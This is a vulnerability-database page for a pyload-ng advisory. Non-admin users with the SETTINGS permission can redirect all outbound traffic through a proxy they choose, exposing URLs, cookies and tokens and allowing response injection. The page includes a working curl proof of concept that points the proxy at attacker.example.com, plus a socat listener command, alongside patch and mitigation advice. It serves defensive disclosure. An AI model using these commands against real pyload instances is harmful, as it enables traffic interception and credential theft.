Skip to main content

pyload-ng CVE-2026-42313

| EUVDEUVD-2026-29121 HIGH
Unintended Proxy or Intermediary ('Confused Deputy') (CWE-441)
2026-05-04 https://github.com/pyload/pyload GHSA-pg67-9wjv-mr85
8.3
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
8.3 HIGH
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
Low

Lifecycle Timeline

2
Source Code Evidence Fetched
May 04, 2026 - 22:31 vuln.today
Analysis Generated
May 04, 2026 - 22:31 vuln.today

DescriptionGitHub Advisory

Summary

The set_config_value() API method (@permission(Perms.SETTINGS)) in src/pyload/core/api/__init__.py gates security-sensitive options behind a hand-maintained allowlist ADMIN_ONLY_CORE_OPTIONS. The allowlist contains ("proxy", "username") and ("proxy", "password") - which protect the proxy credentials - but it does not include ("proxy", "enabled"), ("proxy", "host"), ("proxy", "port"), or ("proxy", "type"). Any authenticated user with the non-admin SETTINGS permission can enable proxying and point pyload at any host they control. From that point, every outbound download, captcha fetch, update check, and plugin HTTP call is transparently routed through the attacker.

Gating only the proxy credentials is ineffective: the attacker is the proxy endpoint, so they do not need pyload's proxy-auth secret. proxy.username / proxy.password were designed so an admin could authenticate to a trusted corporate proxy; they do not help when the non-admin attacker is free to choose the proxy itself.

This is a direct continuation of the fix family CVE-2026-33509 / CVE-2026-35463 / CVE-2026-35464 / CVE-2026-35586, each of which patched a different missed option in the same allowlist. CVE-2026-35586 in particular bundled three related SSL-cert options into one advisory on the same rationale applied here - the four proxy.* fields are jointly required to weaponize the miss and are patched together.

Details

Writer - src/pyload/core/api/__init__.py, set_config_value() (around lines 215-290). The allowlist:

python
ADMIN_ONLY_CORE_OPTIONS = {
    ("general", "storage_folder"),
    ("log", "syslog_host"), ("log", "syslog_port"),
    ("proxy", "password"), ("proxy", "username"),
# <-- credentials gated
    ("reconnect", "script"),
    ("webui", "host"),
    ("webui", "ssl_certfile"), ("webui", "ssl_keyfile"), ("webui", "ssl_certchain"),
    ("webui", "use_ssl"),
}

("proxy", "enabled"), ("proxy", "host"), ("proxy", "port"), ("proxy", "type") are absent.

Reader - src/pyload/core/network/request_factory.py:82-100:

python
def get_proxies(self):
    if not self.pyload.config.get("proxy", "enabled"):
        return {}
    proxy_type     = self.pyload.config.get("proxy", "type")
    proxy_host     = self.pyload.config.get("proxy", "host")
    proxy_port     = self.pyload.config.get("proxy", "port")
    proxy_username = self.pyload.config.get("proxy", "username") or None
    proxy_password = self.pyload.config.get("proxy", "password") or None
    return {"type": proxy_type, ..., "host": proxy_host, "port": proxy_port, ...}

Sink - src/pyload/core/network/http/http_request.py (around lines 211-230) passes the dict to pycurl via PROXY / PROXYPORT / PROXYTYPE options. get_proxies() is called every time a new pycurl handle is constructed, so the new proxy config takes effect on the next outbound request - no restart required.

PoC

Authenticated as any user with Perms.SETTINGS (non-admin role):

bash
# 1) Log in as the SETTINGS (non-admin) user.
curl -c cookies.txt -X POST http://pyload.example:8000/api/login \
    -d 'username=settings_user&password=<password>'
# 2) Redirect all outbound traffic through attacker.example.com:8080.
for kv in \
    'category=proxy&option=enabled&value=True' \
    'category=proxy&option=host&value=attacker.example.com' \
    'category=proxy&option=port&value=8080' \
    'category=proxy&option=type&value=http' ; do
  curl -b cookies.txt -X POST http://pyload.example:8000/api/setConfigValue \
      -d "$kv&section=core"
done
# 3) Enqueue any download (or wait for any periodic update / captcha
#    fetch). The attacker's server receives the full request - URL,
#    query string (often carrying auth tokens on download sites),
#    headers, cookies - and can inject an arbitrary response body.

Verification: run a raw HTTP listener on attacker.example.com:8080 (e.g. socat -v TCP-LISTEN:8080,fork,reuseaddr -), trigger any pyload download, and observe the full request on the listener.

Impact

  • Who: any authenticated user whose role was granted Perms.SETTINGS. Multi-user pyload deployments that delegate settings administration to non-admins are the primary blast radius.
  • What:
  1. Full interception of all outbound HTTP traffic: URLs (including embedded tokens), headers, cookies (download-site session IDs), request bodies, and response bodies flow through the attacker.
  2. Credential theft from any download-site auth cookies or bearer tokens that affected plugins send.
  3. Arbitrary response injection - poisoned archive files into the extractor pipeline; poisoned HTML into anticaptcha solvers; arbitrary content into the update checker.
  4. Chains with the sibling ssl_verify advisory: if the attacker additionally sets general.ssl_verify=off (same authz family), the MitM works for HTTPS too, with forged certs accepted for any hostname. Both settings together let the attacker fully weaponize what set_config_value already permits to a SETTINGS user.
  • Why gating the credentials alone is insufficient: already covered in the summary - the attacker owns the proxy endpoint, so they do not need pyload's proxy-auth creds.

AnalysisAI

Authenticated users with non-admin SETTINGS permission in pyload-ng ≤0.5.0b3.dev99 can redirect all outbound HTTP traffic through attacker-controlled proxies by modifying ungated proxy configuration fields (enabled, host, port, type). The vulnerability is an incomplete fix in a series of authorization bypass issues (CVE-2026-33509/-35463/-35464/-35586) where a hand-maintained allowlist in set_config_value() gates only proxy credentials (username/password) but not the proxy destination itself, allowing credential theft, traffic interception, and response injection across downloads, captcha solvers, and update checks. No public exploit identified at time of analysis, though the GitHub advisory includes a working proof-of-concept demonstrating traffic redirection via API calls. Patch confirmed in version 0.5.0b3.dev100 per vendor advisory GHSA-pg67-9wjv-mr85.

Technical ContextAI

pyload-ng is a Python-based download manager (pip package) with role-based API authorization. The set_config_value() method applies a permission decorator @permission(Perms.SETTINGS) and validates security-sensitive options against ADMIN_ONLY_CORE_OPTIONS allowlist (CWE-441: Unintended Proxy or Intermediary). The allowlist covers proxy.username and proxy.password to prevent credential disclosure to SETTINGS-role users, but omits the four operational proxy settings (enabled, host, port, type). The get_proxies() method in request_factory.py reads all six proxy config keys and passes them to pycurl (PROXY, PROXYPORT, PROXYTYPE options) on every HTTP handle construction, making proxy redirection take effect immediately without restart. This incomplete gating reflects the same allowlist maintenance failure addressed in four prior CVEs in this family, where related network configuration options were progressively added to ADMIN_ONLY_CORE_OPTIONS.

RemediationAI

Upgrade to pyload-ng version 0.5.0b3.dev100 or later, which adds the four proxy operational settings (enabled, host, port, type) to ADMIN_ONLY_CORE_OPTIONS allowlist per vendor patch at https://github.com/pyload/pyload/security/advisories/GHSA-pg67-9wjv-mr85. If immediate upgrade is not feasible, revoke Perms.SETTINGS from all non-admin user roles and restrict configuration changes to full administrators only-this removes the privilege escalation vector but eliminates delegated settings management capability. Network-level compensating control: enforce egress filtering to block outbound connections on non-standard proxy ports (block all except required destination IPs for known download sources) and monitor proxy configuration file changes via file integrity monitoring, though this approach incurs operational overhead and does not address API-layer authorization. Review all user role assignments to ensure SETTINGS permission aligns with full trust boundaries; pyload-ng's permission model assumes SETTINGS users are semi-trusted operators, but this vulnerability series demonstrates that assumption is unsafe in the current allowlist implementation.

More in Python

View all
CVE-2025-24016 CRITICAL POC
9.9 Feb 10

Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t

CVE-2025-27520 CRITICAL POC
9.8 Apr 04

BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser

CVE-2025-2945 CRITICAL POC
9.9 Apr 03

pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi

CVE-2013-5093 MEDIUM POC
6.8 Sep 27

The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python

CVE-2025-32375 CRITICAL POC
9.8 Apr 09

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica

CVE-2014-0224 HIGH POC
7.4 Jun 05

OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph

CVE-2024-21644 HIGH POC
7.5 Jan 08

pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.

CVE-2017-9462 HIGH POC
8.8 Jun 06

In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2024-21645 MEDIUM POC
5.3 Jan 08

pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne

CVE-2026-33017 CRITICAL POC
9.3 Mar 17

Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301

CVE-2026-55255 HIGH POC
8.4 Jun 19

Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing

Share

CVE-2026-42313 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy